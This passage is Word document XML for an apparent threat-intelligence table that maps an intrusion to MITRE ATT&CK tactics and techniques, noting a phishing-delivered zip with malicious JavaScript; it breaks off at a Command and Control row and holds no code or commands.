            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B2193B5" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="022C74FA" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E9055C9" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0237FE5B" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="392596B1" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w14:paraId="3CE05954" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B06CF8" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49515AE8" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="511956F0" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54291B2A" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4803FC44" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BF186A8" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BC7BF95" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="190DAE31" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A56C2" w:rsidRPr="004A56C2" w14:paraId="1748C0F4" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05CFC8F5" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F5CFF87" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DC38B12" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1566.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51BB381C" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16646CB5" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25AB09C3" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DA2458C" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4552DF2E" w14:textId="2B288102" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:t>[1</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidR="007B3C24" w:rsidRPr="004A56C2">
              <w:t xml:space="preserve"> We</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="007B3C24" w:rsidRPr="004A56C2">
              <w:t xml:space="preserve"> assess with moderate confidence that the initial vector used by the threat actor was a zip file, which included a malicious JavaScript file, delivered through a phishing campaign</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A56C2" w:rsidRPr="004A56C2" w14:paraId="6EC7949C" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D1F10ED" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BD94E76" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AA3A9BC" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1204.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> User Execution : Malicious File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63B352DB" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="717E9949" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20CB7DC8" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39A529AA" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="103C2797" w14:textId="50B34E86" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="007B3C24" w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A56C2" w:rsidRPr="004A56C2" w14:paraId="7854FFBF" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FA81AF9" w14:textId="1F4C35AD" w:rsidR="007B3C24" w:rsidRPr="004A56C2" w:rsidRDefault="007B3C24" w:rsidP="00EB34BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F1F6D3E" w14:textId="77777777" w:rsidR="007B3C24" w:rsidRPr="004A56C2" w:rsidRDefault="007B3C24" w:rsidP="00EB34BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33AEB280" w14:textId="35F8B6C7" w:rsidR="007B3C24" w:rsidRPr="004A56C2" w:rsidRDefault="007B3C24" w:rsidP="00EB34BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Scripting Interpreter: JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50029D35" w14:textId="77777777" w:rsidR="007B3C24" w:rsidRPr="004A56C2" w:rsidRDefault="007B3C24" w:rsidP="00EB34BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F55E9C0" w14:textId="77777777" w:rsidR="007B3C24" w:rsidRPr="004A56C2" w:rsidRDefault="007B3C24" w:rsidP="00EB34BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DF52903" w14:textId="77777777" w:rsidR="007B3C24" w:rsidRPr="004A56C2" w:rsidRDefault="007B3C24" w:rsidP="00EB34BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7133561E" w14:textId="77777777" w:rsidR="007B3C24" w:rsidRPr="004A56C2" w:rsidRDefault="007B3C24" w:rsidP="00EB34BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="597BAAD1" w14:textId="77777777" w:rsidR="007B3C24" w:rsidRPr="004A56C2" w:rsidRDefault="007B3C24" w:rsidP="00EB34BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A56C2" w:rsidRPr="004A56C2" w14:paraId="70512F07" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1158FB3E" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DAB3B03" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
